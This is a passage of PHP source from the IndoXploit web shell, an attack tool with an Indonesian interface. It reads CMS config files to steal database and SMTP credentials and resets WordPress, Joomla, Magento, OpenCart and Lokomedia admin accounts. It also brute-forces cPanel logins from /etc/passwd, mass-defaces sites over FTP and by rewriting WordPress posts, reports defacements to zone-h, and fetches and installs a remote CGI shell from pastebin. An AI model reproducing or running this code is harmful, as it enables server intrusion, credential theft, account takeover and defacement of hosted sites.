  759. $pass_baru = md5($_POST['pass_baru']);
  760. $conf = $_POST['config_dir'];
  761. $scan_conf = scandir($conf);
  762. foreach($scan_conf as $file_conf) {
  763. if(!is_file("$conf/$file_conf")) continue;
  764. $config = file_get_contents("$conf/$file_conf");
  765. if(preg_match("/JConfig|joomla/",$config)) {
  766. $dbhost = ambilkata($config,"host = '","'");
  767. $dbuser = ambilkata($config,"user = '","'");
  768. $dbpass = ambilkata($config,"password = '","'");
  769. $dbname = ambilkata($config,"db = '","'");
  770. $dbprefix = ambilkata($config,"dbprefix = '","'");
  771. $prefix = $dbprefix."users";
  772. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  773. $db = mysql_select_db($dbname);
  774. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  775. $result = mysql_fetch_array($q);
  776. $id = $result['id'];
  777. $site = ambilkata($config,"sitename = '","'");
  778. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  779. echo "Config => ".$file_conf."<br>";
  780. echo "CMS => Joomla<br>";
  781. if($site == '') {
  782. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  783. } else {
  784. echo "Sitename => $site<br>";
  785. }
  786. if(!$update OR !$conn OR !$db) {
  787. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  788. } else {
  789. echo "Status => <font color=#18BC9C>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  790. }
  791. mysql_close($conn);
  792. } elseif(preg_match("/WordPress/",$config)) {
  793. $dbhost = ambilkata($config,"DB_HOST', '","'");
  794. $dbuser = ambilkata($config,"DB_USER', '","'");
  795. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  796. $dbname = ambilkata($config,"DB_NAME', '","'");
  797. $dbprefix = ambilkata($config,"table_prefix = '","'");
  798. $prefix = $dbprefix."users";
  799. $option = $dbprefix."options";
  800. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  801. $db = mysql_select_db($dbname);
  802. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  803. $result = mysql_fetch_array($q);
  804. $id = $result[ID];
  805. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  806. $result2 = mysql_fetch_array($q2);
  807. $target = $result2[option_value];
  808. if($target == '') {
  809. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  810. } else {
  811. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  812. }
  813. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  814. echo "Config => ".$file_conf."<br>";
  815. echo "CMS => Wordpress<br>";
  816. echo $url_target;
  817. if(!$update OR !$conn OR !$db) {
  818. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  819. } else {
  820. echo "Status => <font color=#18BC9C>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  821. }
  822. mysql_close($conn);
  823. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  824. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  825. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  826. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  827. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  828. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  829. $prefix = $dbprefix."admin_user";
  830. $option = $dbprefix."core_config_data";
  831. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  832. $db = mysql_select_db($dbname);
  833. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  834. $result = mysql_fetch_array($q);
  835. $id = $result[user_id];
  836. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  837. $result2 = mysql_fetch_array($q2);
  838. $target = $result2[value];
  839. if($target == '') {
  840. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  841. } else {
  842. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  843. }
  844. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  845. echo "Config => ".$file_conf."<br>";
  846. echo "CMS => Magento<br>";
  847. echo $url_target;
  848. if(!$update OR !$conn OR !$db) {
  849. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  850. } else {
  851. echo "Status => <font color=#18BC9C>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  852. }
  853. mysql_close($conn);
  854. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  855. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  856. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  857. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  858. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  859. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  860. $prefix = $dbprefix."user";
  861. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  862. $db = mysql_select_db($dbname);
  863. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  864. $result = mysql_fetch_array($q);
  865. $id = $result[user_id];
  866. $target = ambilkata($config,"HTTP_SERVER', '","'");
  867. if($target == '') {
  868. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  869. } else {
  870. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  871. }
  872. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  873. echo "Config => ".$file_conf."<br>";
  874. echo "CMS => OpenCart<br>";
  875. echo $url_target;
  876. if(!$update OR !$conn OR !$db) {
  877. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  878. } else {
  879. echo "Status => <font color=#18BC9C>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  880. }
  881. mysql_close($conn);
  882. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  883. $dbhost = ambilkata($config,'server = "','"');
  884. $dbuser = ambilkata($config,'username = "','"');
  885. $dbpass = ambilkata($config,'password = "','"');
  886. $dbname = ambilkata($config,'database = "','"');
  887. $prefix = "users";
  888. $option = "identitas";
  889. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  890. $db = mysql_select_db($dbname);
  891. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  892. $result = mysql_fetch_array($q);
  893. $target = $result[alamat_website];
  894. if($target == '') {
  895. $target2 = $result[url];
  896. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  897. if($target2 == '') {
  898. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  899. } else {
  900. $cek_login3 = file_get_contents("$target2/adminweb/");
  901. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  902. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  903. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  904. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  905. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  906. } else {
  907. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font><br>";
  908. }
  909. }
  910. } else {
  911. $cek_login = file_get_contents("$target/adminweb/");
  912. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  913. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  914. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  915. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  916. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  917. } else {
  918. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font><br>";
  919. }
  920. }
  921. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  922. echo "Config => ".$file_conf."<br>";
  923. echo "CMS => Lokomedia<br>";
  924. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  925. echo $url_target2;
  926. } else {
  927. echo $url_target;
  928. }
  929. if(!$update OR !$conn OR !$db) {
  930. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  931. } else {
  932. echo "Status => <font color=#18BC9C>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  933. }
  934. mysql_close($conn);
  935. }
  936. }
  937. }
  938. } else {
  939. echo "<center>
  940. <h1>Auto Edit User Config</h1>
  941. <form method='post'>
  942. DIR Config: <br>
  943. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  944. Set User & Pass: <br>
  945. <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
  946. <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
  947. <input type='submit' name='hajar' class='btn btn-success btn-sm' value='Hajar!' style='width: 215px;'>
  948. </form>
  949. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  950. ";
  951. }
  952. } elseif($_GET['do'] == 'cpanel') {
  953. if($_POST['crack']) {
  954. $usercp = explode("\r\n", $_POST['user_cp']);
  955. $passcp = explode("\r\n", $_POST['pass_cp']);
  956. $i = 0;
  957. foreach($usercp as $ucp) {
  958. foreach($passcp as $pcp) {
  959. if(@mysql_connect('localhost', $ucp, $pcp)) {
  960. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  961. } else {
  962. $_SESSION[$ucp] = "1";
  963. $_SESSION[$pcp] = "1";
  964. if($ucp == '' || $pcp == '') {
  965.  
  966. } else {
  967. $i++;
  968. if(function_exists('posix_getpwuid')) {
  969. $domain_cp = file_get_contents("/etc/named.conf");
  970. if($domain_cp == '') {
  971. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  972. } else {
  973. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  974. foreach($domains_cp[1] as $dj) {
  975. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  976. $user_cp_url = $user_cp_url['name'];
  977. if($user_cp_url == $ucp) {
  978. $dom = "<a href='http://$dj/' target='_blank'><font color=#18BC9C>$dj</font></a>";
  979. break;
  980. }
  981. }
  982. }
  983. } else {
  984. $dom = "<font color=red>function is Disable by system</font>";
  985. }
  986. echo "username (<font color=#18BC9C>$ucp</font>) password (<font color=#18BC9C>$pcp</font>) domain ($dom)<br>";
  987. }
  988. }
  989. }
  990. }
  991. }
  992. if($i == 0) {
  993. } else {
  994. echo "<br>sukses nyolong ".$i." Cpanel by <font color=#18BC9C>IndoXploit.</font>";
  995. }
  996. } else {
  997. echo "<center>
  998. <form method='post'>
  999. USER: <br>
  1000. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1001. $_usercp = fopen("/etc/passwd","r");
  1002. while($getu = fgets($_usercp)) {
  1003. if($getu == '' || !$_usercp) {
  1004. echo "<font color=red>Can't read /etc/passwd</font>";
  1005. } else {
  1006. preg_match_all("/(.*?):x:/", $getu, $u);
  1007. foreach($u[1] as $user_cp) {
  1008. if(is_dir("/home/$user_cp/public_html")) {
  1009. echo "$user_cp\n";
  1010. }
  1011. }
  1012. }
  1013. }
  1014. echo "</textarea><br>
  1015. PASS: <br>
  1016. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1017. function cp_pass($dir) {
  1018. $pass = "";
  1019. $dira = scandir($dir);
  1020. foreach($dira as $dirb) {
  1021. if(!is_file("$dir/$dirb")) continue;
  1022. $ambil = file_get_contents("$dir/$dirb");
  1023. if(preg_match("/WordPress/", $ambil)) {
  1024. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1025. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1026. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1027. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1028. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1029. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1030. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1031. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1032. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1033. } elseif(preg_match("/^[client]$/", $ambil)) {
  1034. preg_match("/password=(.*?)/", $ambil, $pass1);
  1035. if(preg_match('/"/', $pass1[1])) {
  1036. $pass1[1] = str_replace('"', "", $pass1[1]);
  1037. $pass .= $pass1[1]."\n";
  1038. } else {
  1039. $pass .= $pass1[1]."\n";
  1040. }
  1041. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1042. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1043. }
  1044. }
  1045. echo $pass;
  1046. }
  1047. $cp_pass = cp_pass($dir);
  1048. echo $cp_pass;
  1049. echo "</textarea><br>
  1050. <input type='submit' name='crack' class='btn btn-success btn-sm' style='width: 450px;' value='Crack'>
  1051. </form>
  1052. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1053. }
  1054. } elseif($_GET['do'] == 'cpftp_auto') {
  1055. if($_POST['crack']) {
  1056. $usercp = explode("\r\n", $_POST['user_cp']);
  1057. $passcp = explode("\r\n", $_POST['pass_cp']);
  1058. $i = 0;
  1059. foreach($usercp as $ucp) {
  1060. foreach($passcp as $pcp) {
  1061. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1062. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1063. } else {
  1064. $_SESSION[$ucp] = "1";
  1065. $_SESSION[$pcp] = "1";
  1066. if($ucp == '' || $pcp == '') {
  1067. //
  1068. } else {
  1069. echo "[+] username (<font color=#18BC9C>$ucp</font>) password (<font color=#18BC9C>$pcp</font>)<br>";
  1070. $ftp_conn = ftp_connect($ip);
  1071. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  1072. if((!$ftp_login) || (!$ftp_conn)) {
  1073. echo "[+] <font color=red>Login Gagal</font><br><br>";
  1074. } else {
  1075. echo "[+] <font color=#18BC9C>Login Sukses</font><br>";
  1076. $fi = htmlspecialchars($_POST['file_deface']);
  1077. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  1078. if($deface) {
  1079. $i++;
  1080. echo "[+] <font color=#18BC9C>Deface Sukses</font><br>";
  1081. if(function_exists('posix_getpwuid')) {
  1082. $domain_cp = file_get_contents("/etc/named.conf");
  1083. if($domain_cp == '') {
  1084. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1085. } else {
  1086. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1087. foreach($domains_cp[1] as $dj) {
  1088. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1089. $user_cp_url = $user_cp_url['name'];
  1090. if($user_cp_url == $ucp) {
  1091. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  1092. break;
  1093. }
  1094. }
  1095. }
  1096. } else {
  1097. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1098. }
  1099. } else {
  1100. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  1101. }
  1102. }
  1103. //echo "username (<font color=#18BC9C>$ucp</font>) password (<font color=#18BC9C>$pcp</font>)<br>";
  1104. }
  1105. }
  1106. }
  1107. }
  1108. }
  1109. if($i == 0) {
  1110. } else {
  1111. echo "<br>sukses deface ".$i." Cpanel by <font color=#18BC9C>IndoXploit.</font>";
  1112. }
  1113. } else {
  1114. echo "<center>
  1115. <form method='post'>
  1116. Filename: <br>
  1117. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  1118. Deface Page: <br>
  1119. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  1120. USER: <br>
  1121. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1122. $_usercp = fopen("/etc/passwd","r");
  1123. while($getu = fgets($_usercp)) {
  1124. if($getu == '' || !$_usercp) {
  1125. echo "<font color=red>Can't read /etc/passwd</font>";
  1126. } else {
  1127. preg_match_all("/(.*?):x:/", $getu, $u);
  1128. foreach($u[1] as $user_cp) {
  1129. if(is_dir("/home/$user_cp/public_html")) {
  1130. echo "$user_cp\n";
  1131. }
  1132. }
  1133. }
  1134. }
  1135. echo "</textarea><br>
  1136. PASS: <br>
  1137. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1138. function cp_pass($dir) {
  1139. $pass = "";
  1140. $dira = scandir($dir);
  1141. foreach($dira as $dirb) {
  1142. if(!is_file("$dir/$dirb")) continue;
  1143. $ambil = file_get_contents("$dir/$dirb");
  1144. if(preg_match("/WordPress/", $ambil)) {
  1145. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1146. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1147. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1148. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1149. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1150. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1151. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1152. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1153. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1154. } elseif(preg_match("/client/", $ambil)) {
  1155. preg_match("/password=(.*)/", $ambil, $pass1);
  1156. if(preg_match('/"/', $pass1[1])) {
  1157. $pass1[1] = str_replace('"', "", $pass1[1]);
  1158. $pass .= $pass1[1]."\n";
  1159. }
  1160. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1161. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1162. }
  1163. }
  1164. echo $pass;
  1165. }
  1166. $cp_pass = cp_pass($dir);
  1167. echo $cp_pass;
  1168. echo "</textarea><br>
  1169. <input type='submit' name='crack' style='width: 450px;' class='btn btn-success btn-sm' value='Hajar'>
  1170. </form>
  1171. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1172. }
  1173. } elseif($_GET['do'] == 'smtp') {
  1174. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1175. function scj($dir) {
  1176. $dira = scandir($dir);
  1177. foreach($dira as $dirb) {
  1178. if(!is_file("$dir/$dirb")) continue;
  1179. $ambil = file_get_contents("$dir/$dirb");
  1180. $ambil = str_replace("$", "", $ambil);
  1181. if(preg_match("/JConfig|joomla/", $ambil)) {
  1182. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1183. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1184. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1185. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1186. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1187. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1188. echo "SMTP Host: <font color=#18BC9C>$smtp_host</font><br>";
  1189. echo "SMTP port: <font color=#18BC9C>$smtp_port</font><br>";
  1190. echo "SMTP user: <font color=#18BC9C>$smtp_user</font><br>";
  1191. echo "SMTP pass: <font color=#18BC9C>$smtp_pass</font><br>";
  1192. echo "SMTP auth: <font color=#18BC9C>$smtp_auth</font><br>";
  1193. echo "SMTP secure: <font color=#18BC9C>$smtp_secure</font><br><br>";
  1194. }
  1195. }
  1196. }
  1197. $smpt_hunter = scj($dir);
  1198. echo $smpt_hunter;
  1199. } elseif($_GET['do'] == 'auto_wp') {
  1200. if($_POST['hajar']) {
  1201. $title = htmlspecialchars($_POST['new_title']);
  1202. $pn_title = str_replace(" ", "-", $title);
  1203. if($_POST['cek_edit'] == "Y") {
  1204. $script = $_POST['edit_content'];
  1205. } else {
  1206. $script = $title;
  1207. }
  1208. $conf = $_POST['config_dir'];
  1209. $scan_conf = scandir($conf);
  1210. foreach($scan_conf as $file_conf) {
  1211. if(!is_file("$conf/$file_conf")) continue;
  1212. $config = file_get_contents("$conf/$file_conf");
  1213. if(preg_match("/WordPress/", $config)) {
  1214. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1215. $dbuser = ambilkata($config,"DB_USER', '","'");
  1216. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1217. $dbname = ambilkata($config,"DB_NAME', '","'");
  1218. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1219. $prefix = $dbprefix."posts";
  1220. $option = $dbprefix."options";
  1221. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1222. $db = mysql_select_db($dbname);
  1223. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1224. $result = mysql_fetch_array($q);
  1225. $id = $result[ID];
  1226. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1227. $result2 = mysql_fetch_array($q2);
  1228. $target = $result2[option_value];
  1229. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1230. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1231. echo "<div style='margin: 5px auto;'>";
  1232. if($target == '') {
  1233. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1234. } else {
  1235. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1236. }
  1237. if(!$update OR !$conn OR !$db) {
  1238. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1239. } else {
  1240. echo "<font color=#18BC9C>sukses di ganti.</font><br>";
  1241. }
  1242. echo "</div>";
  1243. mysql_close($conn);
  1244. }
  1245. }
  1246. } else {
  1247. echo "<center>
  1248. <h1>Auto Edit Title+Content WordPress</h1>
  1249. <form method='post'>
  1250. DIR Config: <br>
  1251. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1252. Set Title: <br>
  1253. <input type='text' name='new_title' value='Hacked by IndoXploit' placeholder='New Title'><br><br>
  1254. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1255. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1256. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1257. <input type='submit' class='btn btn-success btn-sm' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1258. </form>
  1259. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1260. ";
  1261. }
  1262. } elseif($_GET['do'] == 'zoneh') {
  1263. if($_POST['submit']) {
  1264. $domain = explode("\r\n", $_POST['url']);
  1265. $nick = $_POST['nick'];
  1266. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1267. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1268. function zoneh($url,$nick) {
  1269. $ch = curl_init("http://www.zone-h.com/notify/single");
  1270. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1271. curl_setopt($ch, CURLOPT_POST, true);
  1272. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1273. return curl_exec($ch);
  1274. curl_close($ch);
  1275. }
  1276. foreach($domain as $url) {
  1277. $zoneh = zoneh($url,$nick);
  1278. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1279. echo "$url -> <font color=#18BC9C>OK</font><br>";
  1280. } else {
  1281. echo "$url -> <font color=red>ERROR</font><br>";
  1282. }
  1283. }
  1284. } else {
  1285. echo "<center><form method='post'>
  1286. <u>Defacer</u>: <br>
  1287. <input type='text' name='nick' size='50' value='IndoXploit'><br>
  1288. <u>Domains</u>: <br>
  1289. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1290. <input type='submit' class='btn btn-success btn-sm' name='submit' value='Submit' style='width: 450px;'>
  1291. </form>";
  1292. }
  1293. echo "</center>";
  1294. } elseif($_GET['do'] == 'cgi') {
  1295. $cgi_dir = mkdir('idx_cgi', 0755);
  1296. $file_cgi = "idx_cgi/cgi.izo";
  1297. $isi_htcgi = "AddHandler cgi-script .izo";
  1298. $htcgi = fopen(".htaccess", "w");
  1299. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  1300. $cgi = fopen($file_cgi, "w");
  1301. fwrite($cgi, $cgi_script);
  1302. fwrite($htcgi, $isi_htcgi);
  1303. chmod($file_cgi, 0755);
  1304. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1305. } elseif($_GET['do'] == 'fake_root') {
  1306. ob_start();
  1307. $cwd = getcwd();
  1308. $ambil_user = explode("/", $cwd);
  1309. $user = $ambil_user[2];
  1310. if($_POST['reverse']) {
  1311. $site = explode("\r\n", $_POST['url']);
  1312. $file = $_POST['file'];
  1313. foreach($site as $url) {
  1314. $cek = getsource("$url/~$user/$file");
  1315. if(preg_match("/hacked/i", $cek)) {
  1316. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=#18BC9C>Fake Root!</font><br>";
  1317. }
  1318. }
  1319. } else {
  1320. echo "<center><form method='post'>
  1321. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1322. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1323. Domain: <br>
  1324. <textarea style='width: 450px; height: 250px;' name='url'>";
  1325. reverse($_SERVER['HTTP_HOST']);
  1326. echo "</textarea><br>
  1327. <input type='submit' class='btn btn-success btn-sm' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1328. </form><br>
  1329. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1330. }
  1331. } elseif($_GET['do'] == 'adminer') {
  1332. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1333. function adminer($url, $isi) {
  1334. $fp = fopen($isi, "w");
  1335. $ch = curl_init();
  1336. curl_setopt($ch, CURLOPT_URL, $url);
  1337. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1338. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1339. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1340. curl_setopt($ch, CURLOPT_FILE, $fp);
  1341. return curl_exec($ch);
  1342. curl_close($ch);
  1343. fclose($fp);
  1344. ob_flush();
  1345. flush();
  1346. }
  1347. if(file_exists('adminer.php')) {
  1348. echo "<center><font color=#18BC9C><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1349. } else {
  1350. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1351. echo "<center><font color=#18BC9C><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1352. } else {
  1353. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1354. }
  1355. }
  1356. } elseif($_GET['do'] == 'auto_dwp') {
  1357. if($_POST['auto_deface_wp']) {
  1358. function anucurl($sites) {
  1359. $ch = curl_init($sites);
  1360. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1361. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1362. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1363. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1364. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1365. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1366. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1367. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1368. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1369. $data = curl_exec($ch);
  1370. curl_close($ch);
  1371. return $data;
  1372. }
  1373. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1374. $post = array(
  1375. "log" => "$userr",
  1376. "pwd" => "$pass",
  1377. "rememberme" => "forever",
  1378. "wp-submit" => "$wp_submit",
  1379. "redirect_to" => "$web",
  1380. "testcookie" => "1",
  1381. );
  1382. $ch = curl_init($cek);
  1383. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1384. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
